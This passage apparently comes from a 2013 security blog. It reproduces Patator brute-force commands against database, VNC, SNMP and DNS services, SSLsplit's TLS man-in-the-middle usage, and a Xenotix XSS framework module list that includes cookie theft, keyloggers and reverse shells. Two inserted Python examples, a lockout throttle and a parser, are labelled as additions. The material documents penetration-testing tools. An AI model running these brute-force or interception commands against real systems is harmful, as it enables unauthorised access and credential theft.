NB. Against Oracle9, it may crash (Segmentation fault) as soon as a valid SID is
found (cx_Oracle bug). Sometimes, the SID gets printed out before the crash,
so try running the same command again if it did not.
}}}
{{{ MySQL
* Brute-force authentication.
mysql_login host=10.0.0.1 user=FILE0 password=FILE0 0=logins.txt -x ignore:fgrep='Access denied for user'
}}}
{{{ PostgreSQL
* Brute-force authentication.
-----------
pgsql_login host=10.0.0.1 user=postgres password=FILE0 0=passwords.txt -x ignore:fgrep='password authentication failed'
}}}
{{{ VNC
Some VNC servers have built-in anti-bruteforce functionality that temporarily
blacklists the attacker IP address after too many wrong passwords.
- RealVNC-4.1.3 or TightVNC-1.3.10 for example, allow 5 failed attempts and
then enforce a 10 second delay. For each subsequent failed attempt that
delay is doubled.
- RealVNC-3.3.7 or UltraVNC allow 6 failed attempts and then enforce a 10
second delay between each following attempt.
* Brute-force authentication.
(a) No need to use more than one thread.
(b) Keep retrying the same password when we are blacklisted by the server.
(c) Exit execution as soon as a valid password is found.
---------
vnc_login host=10.0.0.1 password=FILE0 0=passwords.txt --threads 1                    (a)
  -x retry:fgrep!='Authentication failure' --max-retries -1 -x quit:code=0    (b) (b) (c)
}}}
{{{ DNS
* Brute-force subdomains.
(a) Ignore NXDOMAIN responses (rcode 3).
dns_forward name=FILE0.google.com 0=names.txt -x ignore:code=3   (a)
* Brute-force domain with every possible TLDs.
dns_forward name=google.MOD0 0=TLD -x ignore:code=3
* Brute-force SRV records.
dns_forward name=MOD0.microsoft.com 0=SRV qtype=SRV -x ignore:code=3
* Grab the version of several hosts.
dns_forward server=FILE0 0=hosts.txt name=version.bind qtype=txt qclass=ch
* Reverse lookup several networks.
(a) Ignore names that do not contain 'google.com'.
dns_reverse host=NET0 0=216.239.32.0-216.239.47.255,8.8.8.0/24 -x ignore:code=3 -x ignore:fgrep!=google.com -x ignore:fgrep=216-239-   (a) (b)
}}}
{{{ SNMP
* SNMPv1/2 : Find valid community names.
----------
snmp_login host=10.0.0.1 community=FILE0 0=names.txt -x ignore:mesg='No SNMP response received before timeout'
* SNMPv3 : Find valid usernames.
----------
snmp_login host=10.0.0.1 version=3 user=FILE0 0=logins.txt -x ignore:mesg=unknownUserName
* SNMPv3 : Find valid passwords.
----------
snmp_login host=10.0.0.1 version=3 user=myuser auth_key=FILE0 0=passwords.txt -x ignore:mesg=wrongDigest
NB0. If you get "notInTimeWindow" error messages, increase the retries option.
NB1. SNMPv3 requires passphrases to be at least 8 characters long.
}}}
{{{ Unzip
* Brute-force the ZIP file password (cracking older pkzip encryption used to be not supported in JtR).
----------
unzip_pass zipfile=path/to/file.zip password=FILE0 0=passwords.txt -x ignore:code!=0
}}}
CHANGELOG
* v0.5 2013/07/05
- new modules: mysql_query, tcp_fuzz
- new RANGE and PROG keywords (supersedes the reading from stdin feature)
- switched to impacket for mssql_login
- output more intuitive
- fixed connection cache
- minor bug fixes</span></code></pre>
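Several of the notes in this README describe what a server does in response to repeated failures rather than what the tool does: RealVNC-4.1.3 and TightVNC-1.3.10 tolerate 5 failed attempts and then impose a 10 second delay that doubles on each further failure, RealVNC-3.3.7 and UltraVNC tolerate 6 and then apply a fixed 10 second delay, and Oracle by default locks an account permanently after 10 wrong passwords. The following is an added example, not Patator code, that turns those policies into a reusable throttle a service could put in front of its authentication handler. The class and function names, the client keys (an IP address or an account name) and the timestamps are assumptions made for the illustration; the numbers are the ones stated in the notes above.

```python
from dataclasses import dataclass, field
from typing import Dict, List, Optional, Set, Tuple


@dataclass(frozen=True)
class LockoutPolicy:
    """How a service answers repeated authentication failures from one client."""
    name: str
    free_attempts: int                     # failures tolerated before any delay
    base_delay: float                      # seconds to wait once they are used up
    doubling: bool = False                 # double the delay on each further failure
    permanent_after: Optional[int] = None  # lock for good after this many failures

    def delay_after(self, failures: int) -> Optional[float]:
        """Seconds a client must wait after its Nth consecutive failure.
        None means the client (or account) is now permanently locked."""
        if self.permanent_after is not None and failures >= self.permanent_after:
            return None
        if failures < self.free_attempts:
            return 0.0
        over = failures - self.free_attempts      # 0 on the first throttled failure
        return self.base_delay * (2 ** over) if self.doubling else self.base_delay


# Policies with the figures given in the README's VNC and Oracle notes.
REALVNC_4 = LockoutPolicy("RealVNC-4.1.3 / TightVNC-1.3.10",
                          free_attempts=5, base_delay=10.0, doubling=True)
REALVNC_3 = LockoutPolicy("RealVNC-3.3.7 / UltraVNC", free_attempts=6, base_delay=10.0)
ORACLE = LockoutPolicy("Oracle default profile",
                       free_attempts=10, base_delay=0.0, permanent_after=10)


@dataclass
class AuthThrottle:
    """Tracks consecutive failures per client and enforces the policy's delays.
    'now' is passed in explicitly so the logic is deterministic and testable."""
    policy: LockoutPolicy
    failures: Dict[str, int] = field(default_factory=dict)
    not_before: Dict[str, float] = field(default_factory=dict)
    locked: Set[str] = field(default_factory=set)

    def check(self, client: str, now: float) -> Tuple[bool, Optional[float]]:
        """Return (allowed, wait).  wait is the remaining delay in seconds,
        0.0 when the attempt may proceed, None when permanently locked."""
        if client in self.locked:
            return False, None
        remaining = self.not_before.get(client, 0.0) - now
        if remaining > 0:
            return False, remaining
        return True, 0.0

    def record_failure(self, client: str, now: float) -> Optional[float]:
        """Count a failure and return the delay it triggers (None = locked)."""
        count = self.failures.get(client, 0) + 1
        self.failures[client] = count
        delay = self.policy.delay_after(count)
        if delay is None:
            self.locked.add(client)
            return None
        self.not_before[client] = now + delay
        return delay

    def record_success(self, client: str) -> None:
        """A successful login resets the consecutive-failure counter."""
        self.failures.pop(client, None)
        self.not_before.pop(client, None)


def simulate_failures(policy: LockoutPolicy, n: int,
                      client: str = "client") -> List[Optional[float]]:
    """Delay imposed after each of n back-to-back failures under a policy."""
    throttle = AuthThrottle(policy)
    return [throttle.record_failure(client, now=0.0) for _ in range(n)]


if __name__ == "__main__":
    for policy in (REALVNC_4, REALVNC_3, ORACLE):
        print(policy.name, simulate_failures(policy, 10))
```

The SMB note above ("you must have locked it") is the flip side of such policies: a permanent lock keyed on the account name lets anyone who can reach the login prompt deny service to that account, whereas a delay keyed on the source address only slows the offending client. When choosing a policy, prefer growing delays over permanent locks, and key them on the source where the protocol lets you identify it.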
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Source-</span></code></pre>
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="http://packetstormsecurity.com/files/122392/Patator-Brute-Forcer-0.5.html" style="outline: none;">http://packetstormsecurity.com/files/122392/Patator-Brute-Forcer-0.5.html</a></span></code></pre>
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Website-</span></code></pre>
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a href="https://code.google.com/p/patator/" style="outline: none;">https://code.google.com/p/patator/</a></span></code></pre>
<pre style="font-family: 'andale mono', 'lucida console', monospace; font-size: 13px; line-height: 18px; margin-bottom: 20px; margin-top: 20px; overflow: auto; padding: 0px; white-space: pre-wrap;"><code style="font-family: 'andale mono', 'lucida console', monospace; margin: 0px; padding: 0px;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Screenshot -</span></code></pre>
<div class="separator" style="clear: both; font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmp57sqprPsOSVyP1wbCxHJ-5qbhXkz7ACSabZYgMOw8ubtKOSKxLmkRJPRbvZspesOLk6-i_h8Eo4qd46JptZ55YUl9lFLYAgdnc5y-CQRPehCttUVfNOcZrJ1E9PspAmiahOdKM7ATsN/s1600/patator.JPG" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; outline: none; text-decoration: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;"><img border="0" height="298" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEhmp57sqprPsOSVyP1wbCxHJ-5qbhXkz7ACSabZYgMOw8ubtKOSKxLmkRJPRbvZspesOLk6-i_h8Eo4qd46JptZ55YUl9lFLYAgdnc5y-CQRPehCttUVfNOcZrJ1E9PspAmiahOdKM7ATsN/s1600/patator.JPG" style="border: none; padding: 0px;" width="400" /></span></span></a></div>
</div>
Fahim (http://www.blogger.com/profile/06549473576655561875)
2013-09-02T14:18:00.001-07:00 SSLsplit 0.4.7 – tool for man-in-the-middle attacks against SSL/TLS encrypted network connections<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">SSLsplit is a tool for man-in-the-middle attacks against SSL/TLS encrypted network connections. Connections are transparently intercepted through a network address translation engine and redirected to SSLsplit. SSLsplit terminates SSL/TLS and initiates a new SSL/TLS connection to the original destination address, while logging all data transmitted. SSLsplit is intended to be useful for network forensics and penetration testing.<br /><br />SSLsplit supports plain TCP, plain SSL, HTTP and HTTPS connections over both IPv4 and IPv6. For SSL and HTTPS connections, SSLsplit generates and signs forged X509v3 certificates on-the-fly, based on the original server certificate subject DN and subjectAltName extension. SSLsplit fully supports Server Name Indication (SNI) and is able to work with RSA, DSA and ECDSA keys and DHE and ECDHE cipher suites. SSLsplit can also use existing certificates of which the private key is available, instead of generating forged ones. SSLsplit supports NULL-prefix CN certificates and can deny OCSP requests in a generic way. SSLsplit removes HPKP response headers in order to prevent public key pinning.</span></span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><br /></span><div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Latest release: <a class="external" href="http://mirror.roe.ch/rel/sslsplit/sslsplit-0.4.7.tar.bz2" style="outline: none; text-decoration: none;">sslsplit-0.4.7.tar.bz2</a> (<a class="external" href="http://mirror.roe.ch/rel/sslsplit/sslsplit-latest.1.txt" style="outline: none; text-decoration: none;">sslsplit(1)</a>)</span></div>
<h2 style="font-size: 30px; font-weight: normal; line-height: 1; margin: 0.1875em 0px; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Usage</span></h2>
<pre style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px; margin-bottom: 1.5em; margin-top: 20px; padding: 0px;"><code style="display: block; font-family: 'andale mono', 'lucida console', monospace;">% sslsplit -h
Usage: sslsplit [options...] [proxyspecs...]
  -c pemfile  use CA cert (and key) from pemfile to sign forged certs
  -k pemfile  use CA key (and cert) from pemfile to sign forged certs
  -C pemfile  use CA chain from pemfile (intermediate and root CA certs)
  -K pemfile  use key from pemfile for leaf certs (default: generate)
  -t certdir  use cert+chain+key PEM files from certdir to target all sites
              matching the common names (non-matching: generate if CA)
  -O          deny all OCSP requests on all proxyspecs
  -P          passthrough SSL connections if they cannot be split because of
              client cert auth or no matching cert and no CA (default: drop)
  -g pemfile  use DH group params from pemfile (default: keyfiles or auto)
  -G curve    use ECDH named curve (default: secp160r2 for non-RSA leafkey)
  -Z          disable SSL/TLS compression on all connections
  -s ciphers  use the given OpenSSL cipher suite spec (default: ALL:-aNULL)
  -e engine   specify default NAT engine to use (default: ipfw)
  -E          list available NAT engines and exit
  -u user     drop privileges to user (default if run as root: nobody)
  -j jaildir  chroot() to jaildir (default if run as root: /var/empty)
  -p pidfile  write pid to pidfile (default: no pid file)
  -l logfile  connect log: log one line summary per connection to logfile
  -L logfile  content log: full data to file or named pipe (excludes -S)
  -S logdir   content log: full data to separate files in dir (excludes -L)
  -d          daemon mode: run in background, log error messages to syslog
  -D          debug mode: run in foreground, log debug messages on stderr
  -V          print version information and exit
  -h          print usage information and exit
  proxyspec = type listenaddr+port [natengine|targetaddr+port|"sni"+port]
  e.g.        http 0.0.0.0 8080 www.roe.ch 80  # http/4; static hostname dst
              https ::1 8443 2001:db8::1 443   # https/6; static address dst
              https 127.0.0.1 9443 sni 443     # https/4; SNI DNS lookups
              tcp 127.0.0.1 10025              # tcp/4; default NAT engine
              ssl 2001:db8::2 9999 pf          # ssl/6; NAT engine 'pf'
Example:
  sslsplit -k ca.key -c ca.pem -P  https 127.0.0.1 8443  https ::1 8443
</code></pre>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">See the manual page <a class="external" href="http://mirror.roe.ch/rel/sslsplit/sslsplit-latest.1.txt" style="outline: none; text-decoration: none;">sslsplit(1)</a> for details on using SSLsplit and setting up the various NAT engines.</span></div>
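The proxyspec grammar from the usage text above, turned into a small parser that splits a command line into structured records and rejects malformed specs. This is an added example, not SSLsplit's own code; the NAT engine names come from the operating-system list in this post, and treating "sni" as valid only for the https and ssl types is this example's reading of the usage text (the page only shows sni with https).

```python
"""Parser for the SSLsplit proxyspec arguments shown by `sslsplit -h`:

    proxyspec = type listenaddr+port [natengine|targetaddr+port|"sni"+port]

Several proxyspecs may follow each other on one command line (see the
Example line in the usage text), so the parser must decide where one
spec ends and the next begins. Added example, not code from SSLsplit.
"""
import ipaddress
from dataclasses import dataclass
from typing import List, Optional

# Connection types listed in the usage text.
PROXY_TYPES = ("http", "https", "tcp", "ssl")
# NAT engine names taken from the OS list in this post; a real build
# reports the engines it actually supports via `sslsplit -E`.
NAT_ENGINES = ("pf", "ipfw", "ipfilter", "netfilter", "tproxy")
# Assumption of this example: SNI-based target lookup needs a TLS ClientHello,
# so only the TLS-carrying types may use the "sni" form.
TLS_TYPES = ("https", "ssl")


@dataclass
class ProxySpec:
    kind: str                          # http, https, tcp or ssl
    listen_addr: str
    listen_port: int
    mode: str                          # "nat", "static" or "sni"
    nat_engine: Optional[str] = None   # mode == "nat"; None = default engine (-e)
    target_addr: Optional[str] = None  # mode == "static"
    target_port: Optional[int] = None  # mode == "static" or "sni"


def _port(tok: str) -> int:
    """Parse a TCP port, rejecting anything outside 1..65535."""
    p = int(tok)
    if not 0 < p < 65536:
        raise ValueError(f"port out of range: {tok}")
    return p


def _is_ip(tok: str) -> bool:
    try:
        ipaddress.ip_address(tok)
        return True
    except ValueError:
        return False


def parse_proxyspecs(tokens: List[str]) -> List[ProxySpec]:
    """Parse every proxyspec in `tokens` (options such as -k/-c already removed)."""
    specs: List[ProxySpec] = []
    i, n = 0, len(tokens)
    while i < n:
        kind = tokens[i]
        if kind not in PROXY_TYPES:
            raise ValueError(f"unknown proxyspec type: {kind!r}")
        if i + 2 >= n:
            raise ValueError(f"{kind}: missing listen address or port")
        listen_addr, listen_port = tokens[i + 1], _port(tokens[i + 2])
        if not _is_ip(listen_addr):
            raise ValueError(f"listen address must be an IP address: {listen_addr!r}")
        i += 3
        # The optional third part decides how the destination is found.
        if i >= n or tokens[i] in PROXY_TYPES:
            # Nothing follows (next token starts a new spec): default NAT engine.
            spec = ProxySpec(kind, listen_addr, listen_port, "nat")
        elif tokens[i] == "sni":
            if kind not in TLS_TYPES:
                raise ValueError(f"{kind}: 'sni' requires an https or ssl proxyspec")
            if i + 1 >= n:
                raise ValueError("sni: missing port")
            spec = ProxySpec(kind, listen_addr, listen_port, "sni",
                             target_port=_port(tokens[i + 1]))
            i += 2
        elif tokens[i] in NAT_ENGINES:
            spec = ProxySpec(kind, listen_addr, listen_port, "nat",
                             nat_engine=tokens[i])
            i += 1
        else:
            # Static destination: hostname or IP address followed by a port.
            if i + 1 >= n:
                raise ValueError(f"{tokens[i]}: missing target port")
            spec = ProxySpec(kind, listen_addr, listen_port, "static",
                             target_addr=tokens[i],
                             target_port=_port(tokens[i + 1]))
            i += 2
        specs.append(spec)
    return specs


def check_specs(tokens: List[str]) -> Optional[str]:
    """Return an error message for a bad proxyspec list, or None if it parses."""
    try:
        parse_proxyspecs(tokens)
    except ValueError as err:
        return str(err)
    return None


if __name__ == "__main__":
    # The two proxyspecs from the Example line of the usage text.
    for spec in parse_proxyspecs("https 127.0.0.1 8443 https ::1 8443".split()):
        print(spec)
```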
<h2 style="font-size: 30px; font-weight: normal; line-height: 1; margin: 0.1875em 0px; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Requirements</span></h2>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">SSLsplit depends on the OpenSSL and libevent 2.x libraries. The build depends on GNU make and a POSIX.2 environment in <code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">PATH</code>. The (optional) unit tests depend on check.</span></div>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">SSLsplit currently supports the following operating systems and NAT engines:</span></div>
<ul style="list-style-position: outside; margin: 1em 20px 1em 0px; padding-left: 1.4em;">
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">FreeBSD: pf rdr, ipfw fwd, ipfilter rdr</span></li>
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">OpenBSD: pf rdr</span></li>
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Linux: netfilter REDIRECT and TPROXY</span></li>
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Mac OS X: ipfw fwd</span></li>
</ul>
<h2 style="font-size: 30px; font-weight: normal; line-height: 1; margin: 0.1875em 0px; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Installation</span></h2>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">SSLsplit is or will be available as a package or port on the following systems:</span></div>
<ul style="list-style-position: outside; margin: 1em 20px 1em 0px; padding-left: 1.4em;">
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Arch Linux AUR: <a class="external" href="https://aur.archlinux.org/packages.php?ID=59243" style="outline: none; text-decoration: none;">sslsplit</a></span></li>
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Fedora: <a class="external" href="https://apps.fedoraproject.org/packages/sslsplit" style="outline: none; text-decoration: none;">sslsplit</a></span></li>
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Kali: <a class="external" href="http://git.kali.org/gitweb/?p=packages/sslsplit.git" style="outline: none; text-decoration: none;">sslsplit</a></span></li>
<li style="line-height: 1.5em; list-style-type: square;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Backtrack: <a class="external" href="http://redmine.backtrack-linux.org:8080/issues/916" style="outline: none; text-decoration: none;">sslsplit</a></span></li>
</ul>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">To install from source:</span></div>
<pre style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px; margin-bottom: 1.5em; margin-top: 20px; padding: 0px;"><code style="display: block; font-family: 'andale mono', 'lucida console', monospace;">make
make test     # optional unit tests
make install  # optional install
</code></pre>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Dependencies are autoconfigured using pkg-config. If dependencies are not picked up and fixing <code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">PKG_CONFIG_PATH</code> does not help, you can specify their respective locations manually by setting <code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">OPENSSL_BASE</code>, <code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">LIBEVENT_BASE</code> and/or <code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">CHECK_BASE</code> to the respective prefixes.</span></div>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">You can override the default install prefix (<code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">/usr/local</code>) by setting <code style="font-family: 'andale mono', 'lucida console', monospace; line-height: 18px;">PREFIX</code>.</span></div>
<h2 style="font-size: 30px; font-weight: normal; line-height: 1; margin: 0.1875em 0px; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif; font-size: x-small;">Development</span></h2>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">SSLsplit is being developed on GitHub. For bug reports, please use the GitHub issue tracker. For patch submissions, please send pull requests.</span></div>
<div style="line-height: 1.5em; margin-bottom: 1em; padding: 0px;">
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><a class="external" href="https://github.com/droe/sslsplit" style="outline: none; text-decoration: none;">https://github.com/droe/sslsplit</a></span></div>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Source-<br /><a href="http://www.roe.ch/SSLsplit" style="outline: none;">http://www.roe.ch/SSLsplit</a></span><br /><br />Screenshot -</span><div class="separator" style="clear: both; text-align: center;">
<a href="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBWHUol6ZlIjqOUUIGXb_MKmKT6vMqLJVBrnj8G8dCn890wVRH3qUV2cxZahvEkeLawpVJkfis1pgnFmEDvyr69bYWZqPoBfYcICPIduuAk9Da3RcGX9daQlNr66i_sgtoc-66ZlE2CFz8/s1600/hacking-ssslsplit-tool.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em; outline: none;"><span style="background-color: white; color: black;"><img border="0" src="https://blogger.googleusercontent.com/img/b/R29vZ2xl/AVvXsEjBWHUol6ZlIjqOUUIGXb_MKmKT6vMqLJVBrnj8G8dCn890wVRH3qUV2cxZahvEkeLawpVJkfis1pgnFmEDvyr69bYWZqPoBfYcICPIduuAk9Da3RcGX9daQlNr66i_sgtoc-66ZlE2CFz8/s1600/hacking-ssslsplit-tool.jpg" style="border: none; padding: 0px;" /></span></a></div>
<span style="background-color: white;"><br /></span></div>
</div>
Fahim (http://www.blogger.com/profile/06549473576655561875)
2013-09-02T14:17:00.001-07:00 Xenotix XSS Exploit Framework v4 2013 - an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework<div dir="ltr" style="text-align: left;" trbidi="on">
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif; font-size: 13px; line-height: 20px;">OWASP Xenotix XSS Exploit Framework is an advanced Cross Site Scripting (XSS) vulnerability detection and exploitation framework. It provides zero-false-positive scan results with its unique triple browser engine (Trident, WebKit, and Gecko) embedded scanner. It is claimed to have the world’s second-largest XSS payload collection, with about 1500+ distinct XSS payloads for effective XSS vulnerability detection and WAF bypass. It incorporates a feature-rich information gathering module for target reconnaissance. The exploit framework includes highly offensive XSS exploitation modules for penetration testing and proof-of-concept creation.</span></span><br />
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Scanner Modules </span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Manual Mode Scanner </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Auto Mode Scanner </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">DOM Scanner </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Multiple Parameter Scanner </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">POST Request Scanner </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Header Scanner </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Fuzzer </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Hidden Parameter Detector</span></li>
</ul>
<span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Information Gathering Modules </span></div>
<div style="font-family: 'Droid Sans', Arial, Helvetica, sans-serif; font-size: 13px; line-height: 20px;">
<ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Victim Fingerprinting </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Browser Fingerprinting </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Browser Features Detector </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Ping Scan </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Port Scan </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Internal Network Scan</span></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Exploitation Modules </span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Send Message </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Cookie Thief </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Phisher </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Tabnabbing </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Keylogger </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">HTML5 DDoSer </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Executable Drive By </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">JavaScript Shell </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Reverse HTTP WebShell </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Drive-By Reverse Shell </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Metasploit Browser Exploit </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Firefox Reverse Shell Addon (Persistent) </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Firefox Session Stealer Addon (Persistent) </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Firefox Keylogger Addon (Persistent) </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Firefox DDoSer Addon (Persistent) </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Firefox Linux Credential File Stealer Addon (Persistent) </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Firefox Download and Execute Addon (Persistent)</span></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Utility Modules </span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">WebKit Developer Tools </span></li>
<li><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;">Payload Encoder</span></li>
</ul>
<div>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">Support on Facebook </span></span><ul style="line-height: 19.1875px; margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><a href="https://www.facebook.com/xenotix" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Xenotix on Facebook</span></span></a></li>
</ul>
<span style="background-color: white;"><span style="font-family: Georgia, 'Times New Roman', serif;">White Paper and Slides </span></span><ul style="margin: 0px 20px 20px 0px; padding-left: 40px;">
<li><a href="http://www.nullcon.net/website/archives/presentation/Xenotix_XSS_Exploit_Framework_By_Ajin_Abraham.pdf" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Nullcon Goa 2013, India (Slides)</span></span></a></li>
<li><a href="http://www.exploit-db.com/wp-content/themes/exploit/docs/21223.pdf" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Download From Exploit-DB</span></span></a></li>
<li><a href="http://packetstormsecurity.org/files/116455/Detecting-And-Exploiting-XSS-With-Xenotix-XSS-Exploit-Framework.html" style="outline: none;"><span style="background-color: white; font-family: Georgia, 'Times New Roman', serif;"><span style="color: black;">Download From PacketStorm Security</span></span></a></li>
</ul>
